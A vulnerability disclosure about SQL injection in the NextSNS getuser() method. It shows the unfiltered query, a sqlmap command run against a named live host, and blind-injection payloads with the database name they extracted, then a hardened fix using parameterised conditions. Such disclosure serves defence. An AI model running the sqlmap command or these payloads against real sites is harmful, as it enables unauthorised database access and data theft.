### Brief description:
For developers, the right way is to make the product itself secure, rather than relying on some so-called security products to help defend it!
### Details:
Location: Home/Lib/Action/SpaceAction.class.php
Code snippet
```php
// profile: fetch the user
public function getuser() {
    if ($this->my['user_name'] == $_GET['user_name']) {
        $user = $this->my;
    } else {
        // The $_GET['user_name'] parameter is not filtered; this $_GET['user_name'] is the user_name in the URL t.nextsns.com/?user_name
        $user = $this->uModel->where("user_name='$_GET[user_name]'")->find();
    }
    return $user;
}
```
Although a certain "numeric" vendor's defense system is built in, data can still be extracted by injection!
```
python sqlmap.py -u "http://t.nextsns.com/?fate666888*" --batch --dbs --flush-session
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 375 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://t.nextsns.com:80/?fate666888' AND 7549=7549 AND 'etdJ'='etdJ
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://t.nextsns.com:80/?fate666888' AND SLEEP(5) AND 'vvIC'='vvIC
---
back-end DBMS: MySQL 5.0.11
available databases [1]:
[*] etnew
```
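As an added example (not code from the original report or from the NextSNS project), here is the same method written so that the user name never becomes part of the SQL text. It assumes ThinkPHP 3.x, whose `where()` accepts an array of column => value pairs that the framework escapes, the `$this->my` / `$this->uModel` members seen in the report, and an assumed site rule for what a user name may look like.

```php
<?php
// Added example: hardened version of getuser() from the report above.
// Assumptions: ThinkPHP 3.x Model API (array-form where()), and the
// $this->my / $this->uModel members used in the original SpaceAction.
class SpaceAction extends Action {

    // Assumed site rule for user names: letters, digits, underscore, 2-20 chars.
    const USER_NAME_PATTERN = '/^[A-Za-z0-9_]{2,20}$/';

    // Returns the user record for ?user_name=..., or null when the value is
    // missing, malformed, or matches no account. No SQL is built by string.
    public function getuser() {
        $name = isset($_GET['user_name']) ? (string)$_GET['user_name'] : '';

        // Whitelist the shape first: quotes, spaces and SQL metacharacters
        // are rejected before any query is issued.
        if (!preg_match(self::USER_NAME_PATTERN, $name)) {
            return null;
        }

        if ($this->my['user_name'] === $name) {
            return $this->my;
        }

        // Array-form condition: ThinkPHP escapes the value itself, so the
        // user name is treated as data, not as part of the SQL. This replaces
        //   where("user_name='$_GET[user_name]'")
        $user = $this->uModel->where(array('user_name' => $name))->find();
        return $user ? $user : null;
    }
}
```

The pattern check is defence in depth; the escaping done by the array-form condition is what actually removes the injection.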
### Proof of vulnerability:
![QQ图片20140212212952.jpg](https://images.seebug.org/upload/201402/122133039d2b43d1623cd964c78fad99fc08ec11.jpg)